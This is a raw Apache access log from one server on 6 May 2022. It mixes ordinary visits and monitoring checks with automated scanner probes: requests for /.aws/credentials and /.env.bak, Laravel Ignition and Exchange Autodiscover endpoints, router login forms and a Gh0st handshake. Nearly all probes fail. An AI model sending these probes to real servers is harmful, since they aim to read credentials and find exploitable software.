170.244.208.81 - - [06/May/2022:03:59:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
213.226.123.30 - - [06/May/2022:04:05:21 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.99.18.122 - - [06/May/2022:04:10:01 +0200] "GET / HTTP/1.1" 200 1229 "https://www.google.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/77.0.3865.93 Mobile/15E148 Safari/605.1"
178.216.26.21 - - [06/May/2022:04:16:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
213.226.123.30 - - [06/May/2022:04:18:43 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:04:28:06 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:04:30:32 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:04:34:57 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:04:41:35 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.142.125.10 - - [06/May/2022:04:43:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.10 - - [06/May/2022:04:43:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.10 - - [06/May/2022:04:43:30 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
138.118.234.147 - - [06/May/2022:04:43:40 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
213.226.123.30 - - [06/May/2022:04:45:05 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
49.7.20.69 - - [06/May/2022:04:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
213.226.123.30 - - [06/May/2022:04:50:03 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.130.11.103 - - [06/May/2022:04:55:04 +0200] "CONNECT api.myip.com:443 HTTP/1.1" 405 342 "-" "Python/3.9 aiohttp/3.7.4"
128.14.141.34 - - [06/May/2022:05:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [06/May/2022:05:00:16 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.94.145.57 - - [06/May/2022:05:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.57 - - [06/May/2022:05:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.57 - - [06/May/2022:05:01:18 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
45.5.202.99 - - [06/May/2022:05:02:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
217.196.24.199 - - [06/May/2022:05:07:37 +0200] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:37 +0200] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:37 +0200] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:37 +0200] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:37 +0200] "GET /public/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:38 +0200] "GET /TP/html/public/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:38 +0200] "GET /elrekt.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:38 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
217.196.24.199 - - [06/May/2022:05:07:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.118.53.194 - - [06/May/2022:05:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.194 - - [06/May/2022:05:07:55 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:13:35 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
94.125.55.198 - - [06/May/2022:05:13:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
121.89.204.164 - - [06/May/2022:05:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:19:12 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:19:28 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:20:39 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.180.143.11 - - [06/May/2022:05:22:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [06/May/2022:05:23:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [06/May/2022:05:23:34 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.202 - - [06/May/2022:05:23:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.202 - - [06/May/2022:05:23:46 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.248.133.118 - - [06/May/2022:05:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.118 - - [06/May/2022:05:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.118 - - [06/May/2022:05:24:19 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
80.82.78.39 - - [06/May/2022:05:25:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:05:25:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.226.123.30 - - [06/May/2022:05:27:08 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:27:34 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:28:41 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
81.103.206.108 - - [06/May/2022:05:31:47 +0200] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "0xAbyssalDoesntExist"
185.180.143.7 - - [06/May/2022:05:32:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:35:35 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:05:36:20 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.164.204.146 - - [06/May/2022:05:37:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
209.141.58.146 - - [06/May/2022:05:37:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
137.184.214.165 - - [06/May/2022:05:40:34 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.85:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
80.82.78.39 - - [06/May/2022:05:44:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:05:44:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.226.123.30 - - [06/May/2022:05:48:07 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
66.240.205.34 - - [06/May/2022:05:50:01 +0200] "Gh0st\xad" 501 321 "-" "-"
213.226.123.30 - - [06/May/2022:05:59:39 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.209.125.51 - - [06/May/2022:06:02:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
213.226.123.30 - - [06/May/2022:06:03:45 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
188.159.31.200 - - [06/May/2022:06:06:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:12:08 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:13:03 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.61.188.169 - - [06/May/2022:06:14:36 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
213.226.123.30 - - [06/May/2022:06:16:18 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.180.143.11 - - [06/May/2022:06:17:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:20:14 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.230.216.203 - - [06/May/2022:06:20:49 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [06/May/2022:06:20:50 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
80.82.78.39 - - [06/May/2022:06:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:06:21:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.226.123.30 - - [06/May/2022:06:22:26 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:26:06 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
172.104.138.223 - - [06/May/2022:06:26:57 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:29:44 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:34:56 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.230.216.203 - - [06/May/2022:06:36:39 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [06/May/2022:06:36:40 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
213.226.123.30 - - [06/May/2022:06:41:39 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.61.188.169 - - [06/May/2022:06:46:08 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
213.226.123.30 - - [06/May/2022:06:46:30 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:48:39 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:52:39 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /config/aws.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
149.202.15.205 - - [06/May/2022:06:53:41 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
213.226.123.30 - - [06/May/2022:06:56:33 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:07:00:20 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:01:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:02:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.226.123.30 - - [06/May/2022:07:02:37 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:03:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.249.33.53 - - [06/May/2022:07:03:48 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/May/2022:07:04:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:05:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:06:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:08:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:09:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.80 - - [06/May/2022:07:09:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
80.82.78.39 - - [06/May/2022:07:09:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:07:09:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [06/May/2022:07:10:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:11:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:12:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:13:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.202 - - [06/May/2022:07:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.202 - - [06/May/2022:07:14:54 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:15:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:16:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.144 - - [06/May/2022:07:16:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [06/May/2022:07:17:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.18.147.24 - - [06/May/2022:07:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:18:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:19:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:20:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.136.151.226 - - [06/May/2022:07:20:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:21:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.144 - - [06/May/2022:07:21:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [06/May/2022:07:22:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.144 - - [06/May/2022:07:22:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
79.135.130.49 - - [06/May/2022:07:22:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:23:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
